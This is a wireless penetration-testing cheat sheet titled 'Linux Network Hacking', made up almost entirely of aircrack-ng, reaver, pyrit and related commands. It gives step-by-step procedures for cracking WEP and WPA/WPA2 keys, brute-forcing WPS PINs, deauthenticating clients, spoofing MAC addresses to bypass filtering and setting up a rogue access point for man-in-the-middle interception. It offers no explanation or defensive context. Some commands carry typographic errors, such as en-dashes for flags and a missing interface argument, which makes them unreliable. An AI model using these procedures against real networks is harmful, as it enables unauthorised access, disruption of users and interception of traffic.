Linux Network Hacking

1. ### Wireless Penetration Testing Cheat Sheet
2. ## WIRELESS ANTENNA
3. # Open the Monitor Mode
4.  
5. ifconfig wlan0mon down
6. iwconfig wlan0mon mode monitor
7. ifconfig wlan0mon up
8.  
9. # Increase Wi-Fi TX Power
10. iw reg set B0
11. iwconfig wlan0 txpower <NmW|NdBm|off|auto>
12. # txpower is 30 (generally)
13. # txpower is depends your country, please googling
14. iwconfig
15.  
16. # Change WiFi Channel
17. iwconfig wlan0 channel <SetChannel(1-14)>
18.  
19. ## WEP CRACKING
20. # Method 1 : Fake Authentication Attack
21.  
22. airmon-ng start wlan0
23. airodump-ng –c <AP_Channel> --bssid <BSSID> -w <FileName> wlan0mon
24. # What’s my mac?
25. macchanger --show wlan0mon
26. aireplay-ng -1 0 -a <BSSID> -h <OurMac> -e <ESSID> wlan0mon
27. aireplay-ng -2 –p 0841 –c FF:FF:FF:FF:FF:FF –b <BSSID> -h <OurMac> wlan0mon
28. aircrack-ng –b <BSSID> <PCAP_of_FileName>
29.  
30. # Method 2 : ARP Replay Attack
31. airmon-ng start wlan0
32. airodump-ng –c <AP_Channel> --bssid <BSSID> -w <FileName> wlan0mon
33.  
34. # What’s my mac?
35. macchanger --show wlan0mon
36. aireplay-ng -3 –x 1000 –n 1000 –b <BSSID> -h <OurMac> wlan0mon
37. aircrack-ng –b <BSSID> <PCAP_of_FileName>
38.  
39. # Method 3 : Chop Chop Attack
40. airmon-ng start wlan0
41. airodump-ng –c <AP_Channel> --bssid <BSSID> -w <FileName> wlan0mon
42. # What’s my mac?
43. macchanger --show wlan0mon
44. aireplay-ng -1 0 –e <ESSID> -a <BSSID> -h <OurMac> wlan0mon
45. aireplay-ng -4 –b <BSSID> -h <OurMac> wlan0mon
46. # Press ‘y’ ;
47. packetforge-ng -0 –a <BSSID> -h <OurMac> -k <SourceIP> -l <DestinationIP> -y <XOR_PacketFile> -w <FileName2>
48. aireplay-ng -2 –r <FileName2> wlan0mon
49. aircrack-ng <PCAP_of_FileName>
50.  
51. # Method 4 : Fragmentation Attack
52. airmon-ng start wlan0
53. airodump-ng –c <AP_Channel> --bssid <BSSID> -w <FileName> wlan0mon
54. # What’s my mac?
55. macchanger --show wlan0mon
56. aireplay-ng -1 0 –e <ESSID> -a <BSSID> -h <OurMac> wlan0mon
57. aireplay-ng -5 –b<BSSID> -h < OurMac > wlan0mon
58. # Press ‘y’ ;
59. packetforge-ng -0 –a <BSSID> -h < OurMac > -k <SourceIP> -l <DestinationIP> -y <XOR_PacketFile> -w <FileName2>
60. aireplay-ng -2 –r <FileName2> wlan0mon
61. aircrack-ng <PCAP_of_FileName>
62.  
63. # Method 5 : SKA (Shared Key Authentication) Type Cracking
64. airmon-ng start wlan0
65. airodump-ng –c <AP_Channel> --bssid <BSSID> -w <FileName> wlan0mon
66. aireplay-ng -0 10 –a <BSSID> -c <VictimMac> wlan0mon
67. ifconfig wlan0mon down
68. macchanger –-mac <VictimMac> wlan0mon
69. ifconfig wlan0mon up
70. aireplay-ng -3 –b <BSSID> -h <FakedMac> wlan0mon
71. aireplay-ng –-deauth 1 –a <BSSID> -h <FakedMac> wlan0mon
72. aircrack-ng <PCAP_of_FileName>
73.  
74. ## WPA / WPA2 CRACKING
75.  
76. # Method 1 : WPS Attack
77. airmon-ng start wlan0
78. apt-get install reaver
79. wash –i wlan0mon –C
80. reaver –i wlan0mon –b <BSSID> -vv –S
81. # or, Specific attack
82. reaver –i –c <Channel> -b <BSSID> -p <PinCode> -vv –S
83.  
84. # Method 2 : Dictionary Attack
85. airmon-ng start wlan0
86. airodump-ng –c <AP_Channel> --bssid <BSSID> -w <FileName> wlan0mon
87. aireplay-ng -0 1 –a <BSSID> -c <VictimMac> wlan0mon
88. aircrack-ng –w <WordlistFile> -b <BSSID> <Handshaked_PCAP>
89.  
90. # Method 3 : Crack with John The Ripper
91. airmon-ng start wlan0
92. airodump-ng –c <Channel> --bssid <BSSID> -w <FileName> wlan0mon
93. aireplay-ng -0 1 –a <BSSID> -c <VictimMac> wlan0mon
94. cd /pentest/passwords/john
95. ./john –wordlist=<Wordlist> --rules –stdout|aircrack-ng -0 –e <ESSID> -w - <PCAP_of_FileName>
96.  
97. # Method 4 : Crack with coWPAtty
98. airmon-ng start wlan0
99. airodump-ng –c <Channel> --bssid <BSSID> -w <FileName> wlan0mon
100. aireplay-ng -0 1 –a <BSSID> -c <VictimMac> wlan0mon
101. cowpatty –r <FileName> -f <Wordlist> -2 –s <SSID>
102. genpmk –s <SSID> –f <Wordlist> -d <HashesFileName>
103. cowpatty –r <PCAP_of_FileName> -d <HashesFileName> -2 –s <SSID>
104.  
105. # Method 5 : Crack with Pyrit
106. airmon-ng start wlan0
107. airodump-ng –c <Channel> --bssid <BSSID> -w <FileName> wlan0mon
108. aireplay-ng -0 1 –a <BSSID> -c <VictimMac> wlan0mon
109. pyrit –r<PCAP_of_FileName> -b <BSSID> -i <Wordlist> attack_passthrough
110. pyrit –i <Wordlist> import_passwords
111. pyrit –e <ESSID> create_essid
112. pyrit batch
113. pyrit –r <PCAP_of_FileName> attack_db
114.  
115. # Method 6 : Precomputed WPA Keys Database Attack
116. airmon-ng start wlan0
117. airodump-ng –c <AP_Channel> --bssid <BSSID> -w <FileName> wlan0mon
118. aireplay-ng -0 1 –a <BSSID> -c <VictimMac> wlan0mon
119. kwrite ESSID.txt
120. airolib-ng NEW_DB --import essid ESSID.txt
121. airolib-ng NEW_DB --import passwd <DictionaryFile>
122. airolib-ng NEW_DB --clean all
123. airolib-ng NEW_DB --stats
124. airolib-ng NEW_DB --batch
125. airolib-ng NEW_DB --verify all
126. aircrack-ng –r NEW_DB <Handshaked_PCAP>
127.  
128. ## FIND HIDDEN SSID
129.  
130. airmon-ng start wlan0
131. airodump-ng –c <Channel> --bssid <BSSID> wlan0mon
132. aireplay-ng -0 20 –a <BSSID> -c <VictimMac> wlan0mon
133.  
134. ## BYPASS MAC FILTERING
135.  
136. airmon-ng start wlan0
137. airodump-ng –c <AP_Channel> --bssid <BSSID> -w <FileName> wlan0mon
138. aireplay-ng -0 10 –a <BSSID> -c <VictimMac> wlan0mon
139. ifconfig wlan0mon down
140. macchanger –-mac <VictimMac> wlan0mon
141. ifconfig wlan0mon up
142. aireplay-ng -3 –b <BSSID> -h <FakedMac> wlan0mon
143.  
144. ## MAN IN THE MIDDLE ATTACK
145.  
146. airmon-ng start wlan0
147. airbase-ng –e “<FakeBSSID>” wlan0mon
148. brctl addbr <VariableName>
149. brctl addif <VariableName> wlan0mon
150. brctl addif <VariableName> at0
151. ifconfig eth0 0.0.0.0 up
152. ifconfig at0 0.0.0.0 up
153. ifconfig <VariableName> up
154. aireplay-ng –deauth 0 –a <victimBSSID> wlan0mon
155. dhclient3 <VariableName> &
156. wireshark &
157. ;select <VariableName> interface